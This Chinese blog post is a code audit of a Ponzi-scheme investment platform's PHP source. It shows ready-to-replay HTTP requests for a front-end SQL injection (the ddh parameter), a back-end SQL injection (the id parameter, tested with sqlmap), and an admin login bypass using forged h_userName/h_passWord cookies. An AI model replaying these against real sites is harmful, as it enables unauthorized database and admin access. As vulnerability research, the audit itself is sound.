代码审计某资金盘理财系统

免责声明：本公众号所提供的文字和信息仅供学习和研究使用，不得用于任何非法用途。我们强烈谴责任何非法活动，并严格遵守法律法规。读者应该自觉遵守法律法规，不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。

1.介绍

这套系统属于资金盘，资金盘，顾名思义，是将不动的资金变为流动的资金，将个人手中闲散的资金利用起来，用于保值、增值。 但随着融资形式的发展，经过一部分人的加工和修饰，就异化为这样一种现象：它向社会不特定的对象吸收资金，根据行业内游戏规则，承诺高额返利。 表面看上去是资本运作，实质却是庞氏骗局。

2.搭建

环境 php5.6 mysql8 中间件 apache

使用phpstudy搭建 创建网站后 使用navformysql将数据库mf.sql导入到指定的数据库

修改  include/dbConfig.php  数据库信息

直接访问即可。

4.核心文件分析

文件 include/conn.php  这个是网站的核心配置文件

<?php# 文件名称:conn.php 2009-11-1 16:03:03# 网站相关的设置及配置信息header("Content-type: text/html;charset=utf-8");error_reporting(E_ERROR | E_PARSE);//开发时注释掉，正式运营时，开启//@ini_set("display_errors", "Off");@set_time_limit(0);//版本相关设置，防不同版本而出错PHP_VERSION >= '5.1' && date_default_timezone_set('Asia/Shanghai');session_cache_limiter('private, must-revalidate'); @ini_set('session.auto_start',0); if(PHP_VERSION < '4.1.0') {$_GET         = &$HTTP_GET_VARS;$_POST        = &$HTTP_POST_VARS;$_COOKIE      = &$HTTP_COOKIE_VARS;$_SERVER      = &$HTTP_SERVER_VARS;$_ENV         = &$HTTP_ENV_VARS;$_FILES       = &$HTTP_POST_FILES;}//系统通用函数库 及 防注入等非法操作//MAGIC_QUOTES_GPC = off = 0，需要手工转义define('ROOTPATH', substr(dirname(__FILE__), 0, -7));define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());  //isset($_REQUEST['GLOBALS']) && exit('Access Error');require_once 'function.php';foreach(array('_COOKIE', '_POST', '_GET') as $_request) {foreach($$_request as $_key => $_value) {$_key{0} != '_' && $$_key = daddslashes($_value);}}(!MAGIC_QUOTES_GPC) && $_FILES = daddslashes($_FILES);$REQUEST_URI  = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];//页面压缩function_exists('ob_gzhandler') ? ob_start('ob_gzhandler') :ob_start();//用户IPif($_SERVER['HTTP_X_FORWARDED_FOR']){$m_user_ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} elseif($_SERVER['HTTP_CLIENT_IP']){$m_user_ip = $_SERVER['HTTP_CLIENT_IP'];} else{$m_user_ip = $_SERVER['REMOTE_ADDR'];}$m_user_ip  = preg_match('/^([0-9]{1,3}.){3}[0-9]{1,3}$/',$m_user_ip) ? $m_user_ip : 'Unknown';//建立数据库连接$db_settings = parse_ini_file('dbConfig.php');@extract($db_settings);require_once 'mysql.php';$db = new dbmysql();$db->dbconn($con_db_host,$con_db_id,$con_db_pass,$con_db_name);$ckeditor_mc_id = '';$ckeditor_mc_val = '';$ckeditor_mc_lang = "zh-cn";$ckeditor_mc_toolbar = "Default";$ckeditor_mc_height = "400";//操作密码define('CC_ACT_PWD', '123asd..');

这里的代码是重点  get_magic_quotes_gpc() 在php5.6 默认是0

define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); //这个值是0 foreach(array('_COOKIE', '_POST', '_GET') as $_request) { //对传入的cookie、post 、get参数 存在特殊字符串进行过滤 例如' 变成'foreach($$_request as $_key => $_value) {$_key{0} != '_' && $$_key = daddslashes($_value);}}(!MAGIC_QUOTES_GPC) && $_FILES = daddslashes($_FILES); //文件上传 后缀名也会被过滤

在登录的时候传入用户和密码  发现单引号被过滤

5.前台SQL注入漏洞

漏洞文件位置 /member/post.php$ddh参数使用$_GET获取 并不会被过滤。

例子

<?phpinclude 'include/conn.php';echo $username;echo "<hr>";echo $_GET['username'];

如图

使用sqlmap进行测试

GET /member/post.php?ddh=1'&money=2&key=2052cd88bea3f9016a0057436dbbd750 HTTP/1.1Host: www.licai1.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://www.licai1.com/member/index.phpAccept-Encoding: gzip, deflateCookie: m_username=15888888888; m_password=e99a18c428cb38d5f260853678922e03; m_level=4; m_isPass=1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36Accept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1

注入成功

6.后台SQL注入漏洞

漏洞文件位置 D:phpstudy_proWWWwww.licai1.comadminadmin.php

id并没有使用单引号 存在SQL注入

登录后台抓包 使用sqlmap.py -r sql4.txt 进行测试

GET /admin/admin.php?clause=editinfo&id=5 HTTP/1.1Host: www.licai1.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=964l42aof1mlb17jum3k2501m0; h_userName=admin; h_passWord=21232f297a57a5a743894a0e4a801fc3Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflate

注入成功

7.后台验证绕过

漏洞文件位置 admin/chkLogged.php

从cookie获取账号和密码 判断 不为空之后 传入存在的账号进行查询。

访问后台填写cookie即可绕过

Cookie: h_userName=admin; h_passWord=1111

原文始发于微信公众号（moonsec）：代码审计某资金盘理财系统